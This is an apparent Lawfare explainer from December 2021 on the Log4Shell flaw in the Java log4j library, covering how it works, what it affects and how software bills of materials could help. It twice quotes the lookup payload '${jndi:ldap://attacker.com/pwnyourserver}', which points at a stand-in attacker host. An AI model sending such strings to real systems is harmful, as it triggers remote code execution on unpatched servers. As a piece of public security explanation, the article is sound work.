What's the Deal with the Log4Shell Security Nightmare?

Nicholas Weaver
Friday, December 10, 2021, 4:38 PM

The details behind a massive cyber problem.

("Hackers (pt. 2)" by Ifrah Yousuf is licensed under CC BY 4.0 (https://cybervisuals.org/visual/hackers-pt-2//https://creativecommons.org/licenses/by/4.0/)

Published by The Lawfare Institute
in Cooperation With

We live in a strange world. What started out as a Minecraft prank, where a message in chat like ${jndi:ldap://attacker.com/pwnyourserver} would take over either a Minecraft server or client, has now resulted in a 5-alarm security panic as administrators and developers all over the world desperately try to fix and patch systems before the cryptocurrency miners, ransomware attackers and nation-state adversaries rush to exploit thousands of software packages.  

On Dec. 9, Chen Zhaojun of Alibaba Cloud Security Team discovered, tweeted out and released sample code for a vulnerability, now dubbed log4shell, in a very common Java library called log4j used by thousands of projects.  Any project using log4j is potentially vulnerable.  The vulnerability was first discovered on Minecraft and thought to involve only the gaming platform but quick exploration revealed that the vulnerability potentially affects any software using this library.  

Not only does the vulnerability affect thousands of programs but the exploitation of this vulnerability is very straightforward.  Attackers are already starting to launch widespread attacks.  Further compounding the problem is the huge diversity of vulnerable systems, so those responsible for defending systems are going to have a very bad Christmas.

So what is log4j? 

The first rule of being a good programmer is don’t reinvent things.  Instead we re-use code libraries, packages of previously written code that we can just use in our own programs to accomplish particular tasks.  And let’s face it, computer systems are finicky beasts, and errors happen all the time. One of the most common ways to find problems is to simply record everything that happens. When programmers do it we call it “logging”. And good programmers use a library to do so rather than just using a bunch of print()meaning print-to-screen statements scattered through their code.  Log4j is one such library, an incredibly popular one for Java programmers.  

Unfortunately there is a very easy to exploit vulnerability, leaving an enormous volume of projects vulnerable. Recall the famous XKCD “dependency” comic: Almost every project written in Java (and there are a lot of programs, ranging from major products like Minecraft to Internet of Things devices to bespoke custom software) is going to include log4j or a similar library. So if there is a vulnerability in log4j, it now potentially affects huge swaths of digital infrastructure.

So how does the vulnerability work? 

Java has a design flaw in it: It has a lot of complexity and the ability to load random pieces of code and execute them. The most common way this vulnerability expresses itself is through serialization, the ability to take a piece of data and turn it into a Java object, complete with code that is executed with the object. The log4j vulnerability is a combination of Java’s serialization tendencies with an intermingling of code and data in the logging infrastructure.

The log4j’s formatting language includes the ability to trigger code. So when a message containing the string ${jndi:ldap://attacker.com/pwnyourserver} is logged, Java will attempt to fetch the object referred to from the remote server, deserialize it and run the appropriate code. And, of course, there are a lot of toolkits already available to take advantage of this class of vulnerability simply because it is such a common problem in Java systems.

The basic requirement for an attacker to exploit the vulnerability is that the attacker needs to generate a message, any message, that the target program will log.  It could be anything, such as the content of a URL, the username attempting to log in, or any other piece of data that the programmer thinks they might, perhaps, maby, wish that they recorded.  Then the vulnerable server needs the ability to connect back to the attacker in order to download the actual exploit.  But as long as those two conditions are met, there are already straightforward tools to exploit this vulnerability.

So what is affected? 

A better question is “What is not affected?” For example, it turns out at least someplace in Apple’s infrastructure is a Java program that will log the name of a user’s iPhone, so, as of a few hours ago, one could use this to exploit iCloud! Minecraft and Steam gaming platforms are both written in Java and both end up having code paths that log chat messages, which means that they are also vulnerable. Many custom web services naturally log the “user-agent” string, the part of the request that tells the web server what browser you are running. Attackers are already taking advantage of that, attempting malicious requests to compromise vulnerable servers. It wouldn’t surprise me if this article, if I replaced the example strings with actual malicious links, might trigger some exploitation somewhere!

So what now? 

The problem is in getting patches out to a huge number of projects. It’s an easy-to-exploit vulnerability that it was also (almost) easily patched, notwithstanding the fact that the initial patch didn’t work correctly. But since log4j is a library used in many projects, these projects all need to be updated to incorporate the patch, or else they will be vulnerable to exploitation. And a programmer might not even know that this vulnerability exists in their code because they might be using some other library that depends on the log4j library.  

So it isn’t a matter of patching one program but patching potentially thousands, and at least some programs won’t be patchable until code they depend on is first patched.

What about policy issues? 

There is often talk about the need for a software bill of materials (SBOM) in systems.  A SBOM is a machine-readable list of all external components including libraries, the libraries used by those libraries, and so-on.  A recent executive order, in fact, mandated SBOMs for government purchased systems. 

A correct and complete SBOM is how one would discover that a random piece of code has this vulnerability since the SBOM concept is designed to record these dependency chains. This is why the executive order included a focus on SBOMs, so that at least the government can know, in theory, how many of their systems are trivially vulnerable.  

The federal government is using its market power to get SBOMs as a widely adopted practice among software. This vulnerability represents a clear case demonstrating why a SBOM should be a critical requirement: having a SBOM that includes a reference to log4j version 2.14.1 is a clear indication that a larger software system contains this vulnerability. 

Final Thoughts

A lot of system administrators just saw their weekends ruined. So please have sympathy for them. This is a real crisis, and if it doesn’t explode in all of our faces it will be the result of the hard work of many individuals and groups around the world working frantically to mitigate this problem.

Nicholas Weaver is a senior staff researcher focusing on computer security at the International Computer Science Institute in Berkeley, California, and Chief Mad Scientist/CEO/Janitor of Skerry Technologies, a developer of low cost autonomous drones. All opinions are his own.

Subscribe to Lawfare